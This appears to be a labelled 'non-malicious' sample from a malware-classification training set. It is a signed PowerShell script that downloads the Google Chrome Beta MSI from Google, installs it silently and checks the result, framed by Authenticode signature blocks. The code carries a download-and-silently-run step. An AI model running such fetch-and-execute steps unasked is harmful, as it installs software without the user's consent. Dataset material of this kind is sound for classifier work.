AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGXMwghlvAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAJRFHbMxYWDbgsAAAAAAlEwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIA+B+EZukwaT8LuzTsxMFVRL # J48wx+tVOjsI7NKS8YM/MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAaraVh3Fw6bTEgZ4D3tNn2vch+k4huiA138gY5aMP38ioFYJuvev/IOkv # LX52bSKOHsDSjpo2zVaxQ+igmmg3XyvhFB8lbm24gIdPqhvcvdt1HlTNTfZpsq4d # v2vEEOgjrMC/jIzyy/Ls2DU7FhqMHyQroCULsN9o0gSXj/A0v1V9M01SKj1V19Ik # e44B7VlPldIjGh5y9fc3J0Xp8dxE2WwPAn97qyDugcd9cbywBWaN4GdfjDXWUXvp # OACqJ7W/elf/vwLf5bew4A03LRduVNSqoH5w7YLzEXnmXlCrtVMYHROGH1JJ6e5g # BMzWOO6ObMOtUYnPTnaqutjVU2bD+aGCFv0wghb5BgorBgEEAYI3AwMBMYIW6TCC # FuUGCSqGSIb3DQEHAqCCFtYwghbSAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFRBgsq # hkiG9w0BCRABBKCCAUAEggE8MIIBOAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAfuniGrLmsjnLidHAYBmAceld00x7QB3jI1Tt9fo1PEgIGYrSvBKbI # GBMyMDIyMDYyNjIxMTAxMC40NDVaMASAAgH0oIHQpIHNMIHKMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpBRTJDLUUz # MkItMUFGQzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZaCC # EVQwggcMMIIE9KADAgECAhMzAAABlklbYuEv3fdPAAEAAAGWMA0GCSqGSIb3DQEB # CwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTIxMTIwMjE5MDUx # M1oXDTIzMDIyODE5MDUxM1owgcoxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJTAjBgNVBAsTHE1pY3Jvc29mdCBBbWVyaWNhIE9wZXJhdGlvbnMx # JjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNOOkFFMkMtRTMyQi0xQUZDMSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEF # AAOCAg8AMIICCgKCAgEA0h9sEAtvrf48wOoy+i2TIQzSRtJ79XFKnvh+DBishIEW # VMKdWLB5dSExsovCva5D0SiigItJU/ING9RiIqZFnPKgrRN8Im8aDUeJgsq74BLF # 7rZ28SNaG8fHDH2tl4HIRv1wRmXBbRndFEL15MVGL6JHxtU8gTKpyGb0Ni7XJho/ # OpWj0TbkaHZBDO1VVDtqDEhyW2kzY9W9pAAvLKpcrR9c5n60KUwN62TshJssE+Nw # 0X7DZV5pDSjIluwWnzZx2SxhxmnKYphOHaAzLq98oh/6ggsdjzuKSKpAOlixkjfM # oWGr3EGURVbbJf8fyIri9H8TxqUJkXPOJuNcmrp3L3jYf+f9eDKrGe7oGNYsfH5D # mICQZS7LPJsj4WjAOqnBAf0VlqnAn4cgETYwnJgTRjV3jICsmf/nt2wjpV5lng7V # SQy5jrcxAwS5pINv3rad0/YTl/i6HWMHQZGNp6AgxMz1lWvN+AJpCb0espxHgRo+ # qLlon6V8WqGwXWrG9Pq//XmK/k9NMqyxZ9eq601C51c5Fu5S8l1hKLrL82J7pdxz # wkKKEEuC2NRwSk8k0n7Rl+emYDs+0ZPnrL23K/jYy7wQcu13qJoJLsNRf1K7u5Wf # QEfhEG6YNqbwh0mqzEEB239Rlz4ZQ0x8JHrJEYs+Yz4069Vs/3/vQmceaL7UxdEC # AwEAAaOCATYwggEyMB0GA1UdDgQWBBTS3wjZLC5lrSBhLImLhCqa0c10sjAfBgNV # HSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5o # dHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBU # aW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwG # CCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRz # L01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNV # HRMBAf8EAjAAMBMGA1UdJQQMMAoGCCsGAQUFBwMIMA0GCSqGSIb3DQEBCwUAA4IC # AQCvYAsQuCFW2ClUARz+c7SXP5H4Erm3C+YU0XlRNbsElSqfdkn3fyCLxYBkHMFZ # QGXPA7mzoU7IZUdn0hXyuvrFM6DDrn/SLShe5t+PPkqWeOeYiEw8k4BI6l4U5k07 # wX8hBwOoMRxs1aOe/JNkLHO6krl5j6/GZHrkTRzTsRUUJp1FpnUzixiZWyavc0x/ # imG5yWdrSuccE9ndoq7Qbu1Pxa7swsUm5zNNMunaWGXDFAnS7s8RxJ1/P3qTtZ0J # a6VE6SeoHpdj7/hPuKJLXV/M89GNFn8HUDmVW5+YK/8Dy7yKHHiiSd+ugAN+pW3P # A6OYek0ryW1QKzbrW4P9SXAk+U5faXjBJoitW98+ZERWX387VHvaTWJ4Yo5BmkJ0 # U27Aal2ggi5j1PYuDxB3DsofM+7ebc4zgJ0GF4u6DQW0V4rc/F2zytl2rDQfUGlP # tNUymUZVbWJbFqw64je8QsAnMeG1J8ohxjYlea3iLAzGwime4dbMSyEHoObVvzIN # 0d9BJ84xVeXKvET176GhY/PS6RTJZiW5PPihZh88F3JecEvhlct/FbpQPt+mhDOB # QAyqjI1tdBQlBFVX85xWd1JRnUkuxqshXqFwcxKr8GiFsb9AV7y7TT30fmMTs3gm # nojFQt3MdD5Q3M/gBf1TdlhyiPNXTgJhP6iyZHfxKZi2czCCB3EwggVZoAMCAQIC # EzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYT # AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYD # VQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBS # b290IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoX # DTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 # b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIi # MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC # 0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VG # Iwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP # 2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/P # XfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361 # VI/c+gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwB # Sru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9 # X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269e # wvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDw # wvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr # 9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+e # FnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAj # BgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+n # FV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEw # PwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9j # cy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3 # FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAf # BgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBH # hkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUF # BzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0Nl # ckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4Swf # ZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTC # j/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu # 2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/ # GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3D # YXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbO # xnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqO # Cb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I # 6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0 # zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaM # mdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNT # TY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggLLMIICNAIBATCB+KGB0KSBzTCByjEL # MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v # bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWlj # cm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEmMCQGA1UECxMdVGhhbGVzIFRTUyBF # U046QUUyQy1FMzJCLTFBRkMxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1w # IFNlcnZpY2WiIwoBATAHBgUrDgMCGgMVAND6JppVWWnbirQx4Ic7QWQ35lb+oIGD # MIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNV # BAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG # A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEF # BQACBQDmYyHvMCIYDzIwMjIwNjI3MDIyMDMxWhgPMjAyMjA2MjgwMjIwMzFaMHQw # OgYKKwYBBAGEWQoEATEsMCowCgIFAOZjIe8CAQAwBwIBAAICKOIwBwIBAAICEb8w # CgIFAOZkc28CAQAwNgYKKwYBBAGEWQoEAjEoMCYwDAYKKwYBBAGEWQoDAqAKMAgC # AQACAwehIKEKMAgCAQACAwGGoDANBgkqhkiG9w0BAQUFAAOBgQA8/hfzKsDrERPS # p5UVN2CaNT3fomeDrG5NW07IfMucU2ltpwjPeGU9A463F18nX1vEdh8vEzupH0hL # 8RpX9nN2h5SvF47WXThUWZL3v/8XaZsyOjBm8MzIwvvHOGOoXSIU8hWOgVB4uvim # e/iKdWV5RUjyXCWQAVzJMU6wxqMk+zGCBA0wggQJAgEBMIGTMHwxCzAJBgNVBAYT # AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYD # VQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBU # aW1lLVN0YW1wIFBDQSAyMDEwAhMzAAABlklbYuEv3fdPAAEAAAGWMA0GCWCGSAFl # AwQCAQUAoIIBSjAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwLwYJKoZIhvcN # AQkEMSIEIMlWwWenjXfU+gHXCbwcxFu/WS5vWeptrp3PRGRliZY4MIH6BgsqhkiG # 9w0BCRACLzGB6jCB5zCB5DCBvQQgdgTWAvgdNdOSdkcugn52dCQPCX5WUEOrC6Ry # Ny2yvZAwgZgwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv # bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0 # aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAA # AZZJW2LhL933TwABAAABljAiBCCsgc8FLklYOfxayzvFHO3pvybbhoJF89ShuF18 # Kf54wTANBgkqhkiG9w0BAQsFAASCAgDSHVu4axYB5IxQv+a2r8fLaSyfeSnhuoAX # XVQmy4V4YTq8UWRtFkPBzo7ZUhbqWnjeBaEgnBaMa0yEwfcb5+qNiADbWZpH50Z3 # l9stu0q6uX9w4Qp8cUOUxWdAvYsx3XY05CWGEsraD3Qj3VaYNpXJjfsA5tCf0qkl # 6HVn3HogVmxEP8Md/0KD1ki4u0N6k+hzqTkrGQqO7wZhQEUI2CTODVhFqbUdnSuP # gZ3OQ8WwQgMA6A5EzoveZ/Vu6JQmEf7nsvQrq4rPoULBSuXQ1meHNWEAafoH+aF1 # PtVqr3PTxoVr3b+EhSmXD5POfRBxpMu8/fldzVVvZ1hKfLhhMHwXzS00aIodqAoP # pMpupj8g3FhGNLBt5PT3khTIcC8MBp5tXbI0zxKKz2SNsnFW0pbr4A5CLeBJ/tQk # yd3msRKfqCGKYqAMASMIIslm3P1YtrCCOb7sJDaUO0c3xnSqkopPKwy93USObdnB # iSaEk6zcIAfMgCQ7WiDW802FPLxPR49c3td8ybHzNBbj63mLRbhv58tBqaYGq9zY # b9LTQ8fOW2Z7RN7085Jv6pxMqoQhl/Fg+9B1KSR/Nk7YUL1KKVIuw9V+hB7dNnfm # TS4B/1NFdKxPFso33wgycj3u1ZQC9gMhFit9vpibPDW1/iU+qP4H4vNj3vpds3u3 # 1tDRERTkww== # SIG # End signature block
combined_dataset/train/non-malicious/sample_32_41.ps1
sample_32_41.ps1
$url = 'https://dl.google.com/tag/s/dl/chrome/install/beta/googlechromebetastandaloneenterprise.msi'; if ([Environment]::Is64BitProcess) { $url = 'https://dl.google.com/tag/s/dl/chrome/install/beta/googlechromebetastandaloneenterprise64.msi' } Write-Host "Downloading Google Chrome Beta" $wc = New-Object net.webclient $msiInstaller = "$env:temp\google-chrome-beta.msi" $wc.Downloadfile($url, $msiInstaller) Write-Host "Installing Google Chrome Beta" $arguments = "/i `"$msiInstaller`" /quiet" Start-Process msiexec.exe -ArgumentList $arguments -Wait Remove-Item $msiInstaller $suffix = "\\Google\\Chrome Beta\\Application\\chrome.exe" if (Test-Path "${env:ProgramFiles(x86)}$suffix") { (Get-Item "${env:ProgramFiles(x86)}$suffix").VersionInfo } elseif (Test-Path "${env:ProgramFiles}$suffix") { (Get-Item "${env:ProgramFiles}$suffix").VersionInfo } else { write-host "ERROR: failed to install Google Chrome Beta" exit 1 } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCB1DhiKuwcNb7EH # hh293iRnCPFNZsyeP2TKuN4ynbAnfKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFvbLgHdiNnQIVPdesqjNDzv # 1wu78grmi93RqYLn/aiJMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # 